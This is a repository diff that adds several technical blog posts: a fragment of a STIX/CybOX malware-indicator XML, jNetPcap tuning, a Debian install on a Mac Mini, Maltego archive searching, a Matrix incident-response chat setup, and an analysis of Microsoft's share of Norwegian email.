<WinExecutableFileObj:Size_Of_Raw_Data>8192</WinExecutableFileObj:Size_Of_Raw_Data>
|
||||||
|
</WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Value>3.293891672</WinExecutableFileObj:Value>
|
||||||
|
</WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Header_Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>4a6af2b49d08dd42374deda5564c24ef</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</WinExecutableFileObj:Header_Hashes>
|
||||||
|
</WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Name>.data</WinExecutableFileObj:Name>
|
||||||
|
<WinExecutableFileObj:Size_Of_Raw_Data>110592</WinExecutableFileObj:Size_Of_Raw_Data>
|
||||||
|
</WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Value>6.78785911234</WinExecutableFileObj:Value>
|
||||||
|
</WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Header_Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>c797dda9277ee1d5469683527955d77a</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</WinExecutableFileObj:Header_Hashes>
|
||||||
|
</WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section>
|
||||||
|
<WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Name>.reloc</WinExecutableFileObj:Name>
|
||||||
|
<WinExecutableFileObj:Size_Of_Raw_Data>8192</WinExecutableFileObj:Size_Of_Raw_Data>
|
||||||
|
</WinExecutableFileObj:Section_Header>
|
||||||
|
<WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Value>3.46819043887</WinExecutableFileObj:Value>
|
||||||
|
</WinExecutableFileObj:Entropy>
|
||||||
|
<WinExecutableFileObj:Header_Hashes>
|
||||||
|
<cyboxCommon:Hash>
|
||||||
|
<cyboxCommon:Type xsi:type="cyboxVocabs:HashNameVocab-1.0">MD5</cyboxCommon:Type>
|
||||||
|
<cyboxCommon:Simple_Hash_Value>fbefbe53b3d0ca62b2134f249d249774</cyboxCommon:Simple_Hash_Value>
|
||||||
|
</cyboxCommon:Hash>
|
||||||
|
</WinExecutableFileObj:Header_Hashes>
|
||||||
|
</WinExecutableFileObj:Section>
|
||||||
|
</WinExecutableFileObj:Sections>
|
||||||
|
</cybox:Properties>
|
||||||
|
</cybox:Object>
|
||||||
|
</cybox:Observable>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[1] STIX: https://oasis-open.github.io/cti-documentation/
|
||||||
|
[2] Cybox example: https://github.com/CybOXProject/schemas/blob/master/samples/CybOX_IPv4Address_Instance.xml
|
||||||
|
[3] MAEC: https://maec.mitre.org/
|
||||||
|
[4] OpenIOC to STIX repository on Github: https://github.com/STIXProject/openioc-to-stix
|
||||||
|
[5] STIX 2.x support (MISP): https://github.com/MISP/MISP/issues/2046
|
||||||
|
[6] Janusgraph: http://janusgraph.org/
|
||||||
|
[7] MAR-10135536-F_WHITE_stix.xml: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F_WHITE_stix.xml
|
84
data/jnetpcap-tuning.md
Normal file
84
data/jnetpcap-tuning.md
Normal file
|
@ -0,0 +1,84 @@
|
||||||
|
It comes a time when programming that one will have to start
|
||||||
|
paying attention to performance. As this is true in many cases,
|
||||||
|
there are especially two places that is especially important: With
|
||||||
|
parallel processing and packet captures. Even better if doing both
|
||||||
|
at once. In this article we'll keep the latter in mind together
|
||||||
|
with jNetPcap, a Java wrapper for libpcap able to do 60Kpps per
|
||||||
|
instance.
|
||||||
|
|
||||||
|
First of all I found an excellent post on performance tuning
|
||||||
|
jNetPcap. There's also a good implementation example for moving to
|
||||||
|
the much faster ``JBufferHandler`` [1].
|
||||||
|
|
||||||
|
One should take note of the ring buffer, that is how much memory
|
||||||
|
you will have to temporarily store packets if there's a lot of
|
||||||
|
traffic. Usually this may be e.g. 453k, while the maximum can be
|
||||||
|
4M (for instance 4078 as it was in my case). For tuning this on
|
||||||
|
RedHat one may use ``ethtool -g eth0``, and adjust it with
|
||||||
|
``ethtool -G eth0 rx 4078``. Larger buffers results in high
|
||||||
|
throughput, but also higher latency (which is not that important
|
||||||
|
when doing packet captures). More on ethtool and ring buffer
|
||||||
|
adjustments here.
|
||||||
|
|
||||||
|
When it comes to jNetPcap, the following is an example
|
||||||
|
implementing it as a Apache Flume source [2]:
|
||||||
|
|
||||||
|
@Override
|
||||||
|
public void start() {
|
||||||
|
final ChannelProcessor channel = getChannelProcessor();
|
||||||
|
|
||||||
|
JBufferHandler<ChannelProcessor> jpacketHandler = new JBufferHandler<ChannelProcessor>() {
|
||||||
|
|
||||||
|
public void nextPacket(PcapHeader pcapHeader, JBuffer packet, ChannelProcessor channelProcessor) {
|
||||||
|
int size = packet.size();
|
||||||
|
JBuffer buffer = packet;
|
||||||
|
byte[] packetBytes = buffer.getByteArray(0, size);
|
||||||
|
|
||||||
|
Event flumeEvent = EventBuilder.withBody(packetBytes);
|
||||||
|
channel.processEvent(flumeEvent);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
super.start();
|
||||||
|
pcap.loop(-1, jpacketHandler, channel);
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
The above shows you a slightly different version than the most
|
||||||
|
well-documented example (``PcapHandler``) [3]. You should choose
|
||||||
|
the above one since it is much faster due to the packet
|
||||||
|
referencing. I did a test on one site and the performance
|
||||||
|
increased drastically in terms of improving packet loss on the
|
||||||
|
software-side of things.
|
||||||
|
|
||||||
|
Last but not least, in order to do software side performance
|
||||||
|
monitoring, you might want to add a handler to capture statistics
|
||||||
|
in jNetPcap. This is mentioned here in the jNetPcap forums as well
|
||||||
|
[4]:
|
||||||
|
|
||||||
|
> You can also use PcapStat to see if libpcap is dropping any
|
||||||
|
> packets. If the buffer becomes full and libpcap can't store a
|
||||||
|
> packet, it will record it in statistics. This is different from
|
||||||
|
> the NIC dropping packets.
|
||||||
|
|
||||||
|
This may be implemented in the configuration as shown here:
|
||||||
|
|
||||||
|
PcapStat stats = new PcapStat();
|
||||||
|
pcap = Pcap.openLive(device.getName(), SNAPLEN, Pcap.MODE_PROMISCUOUS, timeout, errbuf);
|
||||||
|
pcap.stats(stats);
|
||||||
|
|
||||||
|
You can get the stats with the following:
|
||||||
|
|
||||||
|
System.out.printf("drop=%d, ifDrop=%d\n",stats.getDrop(), stats.getIfDrop());
|
||||||
|
|
||||||
|
|
||||||
|
Hope this gets you up and running smoothly, tuning packet captures
|
||||||
|
in chain with parallel computing is a challenge.
|
||||||
|
|
||||||
|
To get some more context you may also like to have a look at the
|
||||||
|
presentation that Cisco did on OpenSOC, that's how to do it.
|
||||||
|
|
||||||
|
[1] http://jnetpcap.com/node/67
|
||||||
|
[2] http://flume.apache.org/
|
||||||
|
[3] http://jnetpcap.com/examples/dumper
|
||||||
|
[4] http://jnetpcap.com/node/704
|
173
data/mac-mini-debian.md
Normal file
173
data/mac-mini-debian.md
Normal file
|
@ -0,0 +1,173 @@
|
||||||
|
There are a lot of guides on booting Linux on an Mac Mini, and the
|
||||||
|
Mac Mini is absolutely great. There's also a lot of guides which
|
||||||
|
takes some unnecessary steps on the way from the native OS X
|
||||||
|
experience to the bloated, and difficult-to-setup Linux on OS
|
||||||
|
X. Some of them are good on certain points though.
|
||||||
|
|
||||||
|
So, not surprising, I will tell you how to make it work with both
|
||||||
|
a native EFI installation and the Broadcom BCM4366 up and running.
|
||||||
|
|
||||||
|
Everything will be done on the command line, so this will work
|
||||||
|
great on servers as well. Of course you won't run wifi on the work
|
||||||
|
server though (!).
|
||||||
|
|
||||||
|
First, take note that this will wipe almost everything Apple from
|
||||||
|
you box except the Firmware. You may roll back through pressing
|
||||||
|
the ALT-key while booting.
|
||||||
|
|
||||||
|
Second, you should use Debian 8.0 "Jessie" (which is currently in
|
||||||
|
RC1). This is important since Wheezy doesn't support the Broadcom
|
||||||
|
chipset.
|
||||||
|
|
||||||
|
Prerequisites for this article are:
|
||||||
|
|
||||||
|
* A Mac Mini, tested on an OCT 2014 model
|
||||||
|
* A keyboard
|
||||||
|
* A USB memory stick of at least 2GB (speed is the key)
|
||||||
|
|
||||||
|
## 1. Install Debian - and Change Boot Order
|
||||||
|
|
||||||
|
You should create a bootable USB stick for your Debian
|
||||||
|
installation. When you've downloaded the ISO, you can make it
|
||||||
|
bootable without hassle through Unetbootin [1]. That one works on
|
||||||
|
OS X 10.10 "Yosemite" as well.
|
||||||
|
|
||||||
|
When you've got that one ready insert it into the Mini, holding
|
||||||
|
the ALT-key while booting. You will get to the boot menu, choose
|
||||||
|
the "EFI" one. This will initiate GRUB from the stick.
|
||||||
|
|
||||||
|
Do the installation as you would on any other machine. Since your
|
||||||
|
mac is still setup to boot to OS X, we need to change that next in
|
||||||
|
order to make it point to the Debian installation instead.
|
||||||
|
|
||||||
|
When rebooting, get into the boot menu by holding the ALT-key
|
||||||
|
again. Select that same GRUB menu again, _BUT_ instead of choosing
|
||||||
|
to install it you should now press "c" to get to the GRUB command
|
||||||
|
line.
|
||||||
|
|
||||||
|
It is now time to locate the boot directory [2] on the right
|
||||||
|
disk. Vary X (disk) and Y (partition table) until you find the
|
||||||
|
right combination:
|
||||||
|
|
||||||
|
grub> ls (hdX,gptY)/boot/grub
|
||||||
|
|
||||||
|
That may for instance result in:
|
||||||
|
|
||||||
|
grub> ls (hd2,gpt2)/boot/grub
|
||||||
|
|
||||||
|
Set the ``root`` to that disk and partition table, and boot it:
|
||||||
|
|
||||||
|
grub> set root=(hd2,gpt2)
|
||||||
|
grub> ls -l (hd2,gpt2)
|
||||||
|
grub> linux /boot/vmlinux[...].efi.signed root=UUID=[uuid from above command]
|
||||||
|
grub> initrd /boot/initrd[...]
|
||||||
|
grub> boot
|
||||||
|
|
||||||
|
You will now boot to the one you just installed. It is time to
|
||||||
|
make it persistent and change the boot order with
|
||||||
|
``efibootmgr``. First list your current settings by:
|
||||||
|
|
||||||
|
sudo efibootmgr
|
||||||
|
|
||||||
|
Now change the boot order (may vary, point being that Debian
|
||||||
|
should come first):
|
||||||
|
|
||||||
|
sudo efibootmgr -o 0,1
|
||||||
|
|
||||||
|
Now reboot and enjoy the darkness without wifi.
|
||||||
|
|
||||||
|
## 2. Get Wifi Up and Running (Offline)
|
||||||
|
|
||||||
|
The current Broadcom chipset is quite new, so you'll need to step
|
||||||
|
it up to Debian "Jessie" to get it working. Cutting this a bit
|
||||||
|
short, you will probably need this part to be offline. Showing you
|
||||||
|
a small trick you can get all those dependencies on a vmware
|
||||||
|
installation (run the same image as the one you installed,
|
||||||
|
remember to simulate that you don't have network on that virtual
|
||||||
|
installation):
|
||||||
|
|
||||||
|
apt-get -qq --print-uris install build-essential linux-headers-$(uname -r) broadcom-sta-dkms patch bzip2 wpasupplicant | cut -d\' -f 2 > urls.txt
|
||||||
|
|
||||||
|
This will produce a file of urls that are all the packages
|
||||||
|
requested and its dependencies, get the stick, format it with
|
||||||
|
FAT - and grab the packages to it:
|
||||||
|
|
||||||
|
wget -i urls.txt
|
||||||
|
|
||||||
|
Unmounting that from the virtual installation, insert it into the
|
||||||
|
physical installation:
|
||||||
|
|
||||||
|
cd /mnt/usb
|
||||||
|
dpkg -i *.deb
|
||||||
|
|
||||||
|
Remove all modules that may conflict (and blacklist them in
|
||||||
|
``/etc/modprobe.d/blacklist.config``):
|
||||||
|
|
||||||
|
modprobe -r b44 b43 b43legacy ssb brcmsmac
|
||||||
|
|
||||||
|
Load the Broadcom module:
|
||||||
|
|
||||||
|
modprobe wl
|
||||||
|
echo wl >> /etc/modules
|
||||||
|
|
||||||
|
Everything that's left now is configuring and starting
|
||||||
|
wpasupplicant:
|
||||||
|
|
||||||
|
wpa_passphrase <ssid> [passphrase] > /etc/wpa_supplicant.conf
|
||||||
|
wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant.conf
|
||||||
|
|
||||||
|
To make it persistent enable the interface in
|
||||||
|
``/etc/network/interfaces`` by appending:
|
||||||
|
|
||||||
|
auto wlan0
|
||||||
|
iface wlan0 inet dhcp
|
||||||
|
wpa-conf /etc/wpa_supplicant.conf
|
||||||
|
|
||||||
|
|
||||||
|
If you have made an exception in your DHCP pool, you should also
|
||||||
|
make it static (basic stuff, but anyways):
|
||||||
|
|
||||||
|
auto wlan0
|
||||||
|
iface wlan0 inet static
|
||||||
|
wpa-conf /etc/wpa_supplicant.conf
|
||||||
|
address 192.168.1.2
|
||||||
|
netmask 255.255.255.0
|
||||||
|
gateway 192.168.1.1
|
||||||
|
|
||||||
|
That's basically it. Enjoy the show!
|
||||||
|
|
||||||
|
**Edit 1, FEB 7th 2015:** So I got to play with ``systemd``, since
|
||||||
|
it turns out a service isn't a service the way it used to be. In
|
||||||
|
order to start services in Debian "Jessie", you'll need to use
|
||||||
|
``systemd``. Here's an example for ``znc`` [3]:
|
||||||
|
|
||||||
|
[Unit]
|
||||||
|
Description=An advanced IRC bouncer
|
||||||
|
After=network.target oidentd.socket
|
||||||
|
|
||||||
|
[Service]
|
||||||
|
Type=simple
|
||||||
|
EnvironmentFile=/etc/conf.d/znc
|
||||||
|
User=znc
|
||||||
|
ExecStart=/usr/bin/znc -f $ZNC_OPTIONS
|
||||||
|
ExecReload=/bin/kill -HUP $MAINPID
|
||||||
|
|
||||||
|
[Install]
|
||||||
|
WantedBy=multi-user.target
|
||||||
|
|
||||||
|
Also create the directory and drop the following line into
|
||||||
|
``/etc/conf.d/znc``: ``ZNC_OPTIONS="-d /var/lib/znc"``
|
||||||
|
|
||||||
|
**Edit 2, FEB 7th 2015:** To enable the Mac Mini to auto-restart
|
||||||
|
after power failure set the following PCI value [4]:
|
||||||
|
|
||||||
|
setpci -s 0:1f.0 0xa4.b=0
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[1] http://unetbootin.sourceforge.net/
|
||||||
|
[2]
|
||||||
|
http://askubuntu.com/questions/516535/how-can-i-use-the-installer-to-manually-boot-into-a-system-without-grub-installer
|
||||||
|
[3] https://gist.github.com/tlercher/3897561
|
||||||
|
[4] http://smackerelofopinion.blogspot.no/2011/09/mac-mini-rebooting-tweaks-setpci-s-01f0.html
|
52
data/maltego-search.md
Normal file
52
data/maltego-search.md
Normal file
|
@ -0,0 +1,52 @@
|
||||||
|
I've previously been writing on how to read and process Maltego
|
||||||
|
mtgx graph archives. When you start to get a directory with a lot
|
||||||
|
of them you will probably be like me "Where did I see this thing
|
||||||
|
again?"
|
||||||
|
|
||||||
|
The solution can of course be done in Python like in my previous
|
||||||
|
post, but let's try a more native solution this time, zipgrep:
|
||||||
|
|
||||||
|
> zipgrep will search files within a ZIP archive for lines
|
||||||
|
> matching the given string or pattern. zipgrep is a shell script
|
||||||
|
> and requires egrep(1) and unzip(1L) to function. Its output is
|
||||||
|
> identical to that of egrep(1).
|
||||||
|
|
||||||
|
In my testing I had 20 files, and everything worked pretty well in
|
||||||
|
regard to searching the files by e.g. ``zipgrep 1.2.3.4 \*.mtgx
|
||||||
|
\*.graphml``. The problem here being that zipgrep doesn't seem to
|
||||||
|
support printing the archive names, so thank you for
|
||||||
|
that. Returning to the more basic zip tools, like zip cat was the
|
||||||
|
solution in my case:
|
||||||
|
|
||||||
|
unzip -c \*.mtgx 2>&1 |egrep "(Archive: )|1.2.3.4"
|
||||||
|
|
||||||
|
Archive: 1.mtgx
|
||||||
|
Archive: 2.mtgx
|
||||||
|
Archive: 3.mtgx
|
||||||
|
Archive: 4.mtgx
|
||||||
|
Archive: 5.mtgx
|
||||||
|
Archive: 6.mtgx
|
||||||
|
Archive: 7.mtgx
|
||||||
|
Archive: 8.mtgx
|
||||||
|
Archive: 9.mtgx
|
||||||
|
Archive: 10.mtgx
|
||||||
|
Archive: 11.mtgx
|
||||||
|
Archive: 12.mtgx
|
||||||
|
Archive: 13.mtgx
|
||||||
|
Archive: 14.mtgx
|
||||||
|
Archive: 15.mtgx
|
||||||
|
Archive: 16.mtgx
|
||||||
|
1.2.3.4
|
||||||
|
Archive: 17.mtgx
|
||||||
|
1.2.3.4
|
||||||
|
Archive: 18.mtgx
|
||||||
|
Archive: 19.mtgx
|
||||||
|
Archive: 20.mtgx
|
||||||
|
|
||||||
|
A little Maltego archive insight helps us along speeding up the
|
||||||
|
query, since the graphml file will always stay at
|
||||||
|
``Graphs/Graph1.graphml``
|
||||||
|
|
||||||
|
unzip -c \*.mtgx Graphs/Graph1.graphml 2>&1 |egrep "(Archive: )|1.2.3.4"
|
||||||
|
|
||||||
|
The latter results in the same results as given above.
|
199
data/matrix.md
Normal file
199
data/matrix.md
Normal file
|
@ -0,0 +1,199 @@
|
||||||
|
We have all been there during security operations. One of the
|
||||||
|
parties involved in an incident or daily routine is not prepared
|
||||||
|
for thinking they could be compromised.
|
||||||
|
|
||||||
|
Communications and information sharing is one of the fundamental
|
||||||
|
things that you need to get right during a crisis.
|
||||||
|
|
||||||
|
As now-retired FBI director James Comey put it to 60 minutes [1]:
|
||||||
|
|
||||||
|
> There are two kinds of big companies in the United States. There
|
||||||
|
> are those who've been hacked by the Chinese and those who don't
|
||||||
|
> know they've been hacked by the Chinese.
|
||||||
|
|
||||||
|
The following question always arises: How do we maintain
|
||||||
|
operational security while still being able to communicate with
|
||||||
|
all parties involved?
|
||||||
|
|
||||||
|
In practical terms this requires a communications platform to:
|
||||||
|
|
||||||
|
* Be independent of the service infrastructure
|
||||||
|
* Provide traceability
|
||||||
|
* Be resistant to resourceful threat actors
|
||||||
|
* Have simple and secure identity management
|
||||||
|
* Have cross-platform compability
|
||||||
|
* Provide file-sharing capabilities and ability to give the user
|
||||||
|
an opportunity to express himself
|
||||||
|
* Support video and audio exchanges
|
||||||
|
* Be under the control of the team using it (the smallest circle
|
||||||
|
of trust)
|
||||||
|
* Provide both end-to-end and transport layer encryption
|
||||||
|
* Disposable server infrastructure
|
||||||
|
|
||||||
|
This could have been a bit too much to ask for a couple of years
|
||||||
|
ago, but today there are at least two alternatives satisfying the
|
||||||
|
above requirements: Mattermost and the Matrix ecosystem. For the
|
||||||
|
remainder of this post I will focus on how to establish an ad-hoc
|
||||||
|
system with the tools provided by the Matrix project.
|
||||||
|
|
||||||
|
## Setting Up An Out-of-Band Channel for Incident Handling with Matrix
|
||||||
|
|
||||||
|
Getting started takes three steps:
|
||||||
|
|
||||||
|
1. Establish a back-end server on Digital Ocean
|
||||||
|
2. Serve the Riot front-end website
|
||||||
|
3. Establish a recording capability with Matrix Recorder [2]
|
||||||
|
|
||||||
|
For the two first points, it is clever to use an approach that can
|
||||||
|
be easily reproduced and that provides exactly the same,
|
||||||
|
secure-by-default configuration each time. Due to this the
|
||||||
|
preferred method in this case is to manage the VPS that can be
|
||||||
|
established on anything with Debian or CentOS with Ansible. There
|
||||||
|
is a script available on Github, known as
|
||||||
|
matrix-docker-ansible-deploy [3]. The latter have also been
|
||||||
|
endorsed by the Matrix project [4]. Both 1 and 2 can be
|
||||||
|
accomplished with ``matrix-docker-ansible-deploy``.
|
||||||
|
|
||||||
|
So let's get started.
|
||||||
|
|
||||||
|
### Basic DNS-service
|
||||||
|
|
||||||
|
For this example I created a domain on namesilo.com and pointed
|
||||||
|
that to ``(ns1|ns2|ns3).digitalocean.com``. It would be ufortunate
|
||||||
|
for the continuity of the service if a domain was taken offline or
|
||||||
|
redirected somewhere, but due to the end to end encryption in
|
||||||
|
Matrix it would not compromise the content of the
|
||||||
|
conversations. Now that Digital Ocean has control of the primary
|
||||||
|
domain, make sure to add the following before continuing:
|
||||||
|
|
||||||
|
Type Hostname Value TTL
|
||||||
|
A <domain> <ip> 600
|
||||||
|
A riot.<domain> <ip> 600
|
||||||
|
A matrix.<domain> <ip> 600
|
||||||
|
SRV _matrix._tcp.<domain> 10 0 8448 matrix.<domain> 600
|
||||||
|
|
||||||
|
This can take some time to propagate, so make sure that the
|
||||||
|
DNS-infrastructure is readily resolvable before you continue
|
||||||
|
deploying the services.
|
||||||
|
|
||||||
|
### Configure
|
||||||
|
|
||||||
|
Make sure to grab a copy of the current
|
||||||
|
``matrix-docker-ansible-deploy`` by running:
|
||||||
|
|
||||||
|
git clone https://github.com/spantaleev/matrix-docker-ansible-deploy.git
|
||||||
|
|
||||||
|
Create the following files:
|
||||||
|
|
||||||
|
inventory/host_vars/matrix.<domain>/vars.yml
|
||||||
|
inventory/hosts
|
||||||
|
|
||||||
|
``vars.yml`` should look like this:
|
||||||
|
|
||||||
|
host_specific_matrix_ssl_support_email: <your-contact-email>
|
||||||
|
host_specific_hostname_identity: <domain>
|
||||||
|
matrix_coturn_turn_static_auth_secret: "<run pwgen -s 64 1>"
|
||||||
|
matrix_synapse_macaroon_secret_key: "<run pwgen -s 64 1>"
|
||||||
|
|
||||||
|
The Ansible ``hosts`` file should be formatted like the following:
|
||||||
|
|
||||||
|
all:
|
||||||
|
children:
|
||||||
|
matrix-servers:
|
||||||
|
hosts:
|
||||||
|
matrix.<domain>:
|
||||||
|
ansible_user: root
|
||||||
|
|
||||||
|
### Deploy and Execute
|
||||||
|
|
||||||
|
Now that your configuration files and server are ready, you can
|
||||||
|
start deploying the Matrix Synapse server and start serving the
|
||||||
|
Riot HTML/JS client.
|
||||||
|
|
||||||
|
First deploy the services (Riot and Matrix Synapse) by running:
|
||||||
|
|
||||||
|
ansible-playbook -i inventory/hosts setup.yml --tags=setup-main
|
||||||
|
|
||||||
|
When that completes successfully, you can start the services by:
|
||||||
|
|
||||||
|
ansible-playbook -i inventory/hosts setup.yml --tags=start
|
||||||
|
|
||||||
|
After starting the services, the Riot web interface is available
|
||||||
|
on ``https://riot.<domain>`` where metadata is protected by a
|
||||||
|
Let's Encrypt certificate.
|
||||||
|
|
||||||
|
The two primary endpoints you now have exposed to the WWW is:
|
||||||
|
|
||||||
|
* The Matrix API which runs at https://matrix.<domain>
|
||||||
|
* The Riot UI which runs at https://riot.<domain>
|
||||||
|
|
||||||
|
Going to ``https://riot.<domain>`` brings you to the Riot
|
||||||
|
logon-screen
|
||||||
|
|
||||||
|
### Adding Users
|
||||||
|
|
||||||
|
Registration is disabled by default on the server, so new users
|
||||||
|
can be added by the following command:
|
||||||
|
|
||||||
|
ansible-playbook -i inventory/hosts setup.yml
|
||||||
|
--tags=register-user
|
||||||
|
--extra-vars='username=<first user>
|
||||||
|
password=<some password>
|
||||||
|
admin=(yes|no)'
|
||||||
|
|
||||||
|
It is better to use pseudonyms on such a platform to make sure no
|
||||||
|
information can be traced to a specific individual not involved in
|
||||||
|
the case. Each user needs to verify his private key fingerprint
|
||||||
|
with the other participants.
|
||||||
|
|
||||||
|
### Vital Steps to Take as an Administrator
|
||||||
|
|
||||||
|
When using multiple servers, it is necessary to create an
|
||||||
|
``#control`` channel that is a fallback if a server hosting a room
|
||||||
|
goes down.
|
||||||
|
|
||||||
|
### Setup Matrix Recorder
|
||||||
|
|
||||||
|
To make sure that all communications is stored for traceability
|
||||||
|
make sure to install the Matrix Recorded (MR). MR should be
|
||||||
|
installed locally and _not_ on the Matrix server.
|
||||||
|
|
||||||
|
git clone https://gitlab.com/argit/matrix-recorder.git
|
||||||
|
cd matrix-recorder/
|
||||||
|
npm install
|
||||||
|
|
||||||
|
To execute the recorder, run the following. The first time you
|
||||||
|
will be asked to enter the login credentials of the user.
|
||||||
|
|
||||||
|
$ node matrix-recorder.js <case-folder>
|
||||||
|
Loading olm...
|
||||||
|
Your homeserver (give full URL): https://matrix.<domain>
|
||||||
|
Your username at the homeserver: <username>
|
||||||
|
Your password at the homeserver: <password>
|
||||||
|
No of items to retrieve for initial sync: 1000
|
||||||
|
[...]
|
||||||
|
|
||||||
|
View messages as HTML by running the Matrix Recorder conversion
|
||||||
|
script:
|
||||||
|
|
||||||
|
node recorder-to-html.js <case-folder>
|
||||||
|
|
||||||
|
### Controlling Logins
|
||||||
|
|
||||||
|
Access monitoring can be done in the console by e.g. ``tail -f
|
||||||
|
/matrix/synapse/run/homeserver.log``.
|
||||||
|
|
||||||
|
### The Power of Disposability
|
||||||
|
|
||||||
|
At some point you have finished the information exchange. The
|
||||||
|
beauty of this setup is that is can now be safely deleted from the
|
||||||
|
Digital Ocean droplet console.
|
||||||
|
|
||||||
|
|
||||||
|
[1] James Comey and 60 minutes: https://www.cbsnews.com/news/fbi-director-james-comey-on-threat-of-isis-cybercrime/
|
||||||
|
|
||||||
|
[2] Matrix Recorder: https://matrix.org/docs/projects/other/matrix-recorder.html
|
||||||
|
|
||||||
|
[3] matrix-docker-ansible-deploy: https://github.com/spantaleev/matrix-docker-ansible-deploy
|
||||||
|
|
||||||
|
[4] Matrix project endorsement: https://matrix.org/blog/2018/06/01/this-week-in-matrix-2018-06-01/
|
159
data/microsoft-dominating-email.md
Normal file
159
data/microsoft-dominating-email.md
Normal file
|
@ -0,0 +1,159 @@
|
||||||
|
## Key Takeaways
|
||||||
|
|
||||||
|
* While market dominance was formerly an issue discussed for
|
||||||
|
operating systems, the modern equivalent occurs in form of cloud
|
||||||
|
services, primarily from Microsoft, Amazon and Google.
|
||||||
|
|
||||||
|
* Data from the Norwegian business registry mapped to email
|
||||||
|
records shows that Microsoft Office 365 has become a dominating
|
||||||
|
force amongst Norwegian private businesses and 61% of the
|
||||||
|
government.
|
||||||
|
|
||||||
|
* Microsoft being a significant actor for email indicates that
|
||||||
|
Norwegian organisations are putting a lot more faith in
|
||||||
|
Microsoft. Today email as a service is bundled with direct
|
||||||
|
messaging and wikis.
|
||||||
|
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
In 2003 Dan Geer, Bruce Schneier and others wrote a paper named
|
||||||
|
"How the Dominance of Microsoft's Products Poses a Risk to
|
||||||
|
Security". It eventually cost Geer his job at AtStake.
|
||||||
|
|
||||||
|
The paper evolves around Microsoft's dominance in operating
|
||||||
|
systems and Geer has later given Microsoft credit for a better
|
||||||
|
approach to security [2].
|
||||||
|
|
||||||
|
In this article I am not going to reiterate on the points made by
|
||||||
|
Geer et àl. I think these are perfectly valid and easily
|
||||||
|
transferrable to the current landscape. The whole paper is
|
||||||
|
read-worthy, but I'd like highlight one part:
|
||||||
|
|
||||||
|
> Governments, and perhaps only governments, are in leadership
|
||||||
|
> positions to affect how infrastructures develop. By enforcing
|
||||||
|
> diversity of platform to thereby blunt the monoculture risk,
|
||||||
|
> governments will reap a side benefit of increased market
|
||||||
|
> reliance on interoperability, which is the only foundation for
|
||||||
|
> effective incremental competition and the only weapon against
|
||||||
|
> end-user lock-in. A requirement that no operating system be more
|
||||||
|
> than 50% of the installed based in a critical industry or in a
|
||||||
|
> government would moot monoculture risk. Other branches to the
|
||||||
|
> risk diversification tree can be foliated to a considerable
|
||||||
|
> degree, but the trunk of that tree on which they hang is a total
|
||||||
|
> prohibition of monoculture coupled to a requirement of
|
||||||
|
> standards-based interoperability.
|
||||||
|
|
||||||
|
Azure is Windows in 2021. The walled gardens are somewhat
|
||||||
|
redefined - but they are there in a similar fashion as Windows was
|
||||||
|
in 2003. The Microsoft monopoly is technically broken, and there
|
||||||
|
are now options from Amazon, Google and even Apple, but I would
|
||||||
|
argue the monoculture is still present in shared approaches,
|
||||||
|
infrastructure and concepts.
|
||||||
|
|
||||||
|
I decided to have a closer look at the distribution from a
|
||||||
|
representative dataset provided by an authorative source in
|
||||||
|
Norway; the business registry.
|
||||||
|
|
||||||
|
## Taking a Close Look at The Data
|
||||||
|
|
||||||
|
In Norway we a public registry of organisations. This registry is
|
||||||
|
categorised by standardised sector codes (typically "government",
|
||||||
|
"private" and so on). Using the JSON-data provided by brreg.no, a
|
||||||
|
list of websites can be extracted:
|
||||||
|
|
||||||
|
1. Retrieve the organisation list from brreg.no [1]
|
||||||
|
|
||||||
|
```
|
||||||
|
curl https://data.brreg.no/enhetsregisteret/api/enheter/lastned > enheter.gz
|
||||||
|
gzip -d enheter.gz
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Reshape the JSON data by website URL, sector and business code.
|
||||||
|
|
||||||
|
```
|
||||||
|
cat enheter |
|
||||||
|
jq '[.[] | select(.hjemmeside != null) | {url:.hjemmeside, code:.naeringskode1.kode, sector:.institusjonellSektorkode.kode}]' > webpages.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Based on the URL, add the primary domain and resolve its MX
|
||||||
|
record and the MX primary domain to each JSON entity
|
||||||
|
|
||||||
|
4. Using the JSON-file generated above, populate the following
|
||||||
|
JSON dictionary. This is also a rough categorisation based on
|
||||||
|
the standard provided by Statistics Norway (I'm sure it could
|
||||||
|
be improved) [4]:
|
||||||
|
|
||||||
|
```
|
||||||
|
{
|
||||||
|
"government":{"codes": [6100,6500,1110,1120], "total":0, "counts":{}},
|
||||||
|
"municipals":{"codes": [1510,4900,1520], "total":0, "counts":{}},
|
||||||
|
"finance":{"codes": [3200,3500,3600,4300,3900,4100,4500,4900,5500,5700,4900,7000], "total":0, "counts":{}},
|
||||||
|
"private":{"codes": [4500,4900,2100,2300,2500], "total":0, "counts":{}}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
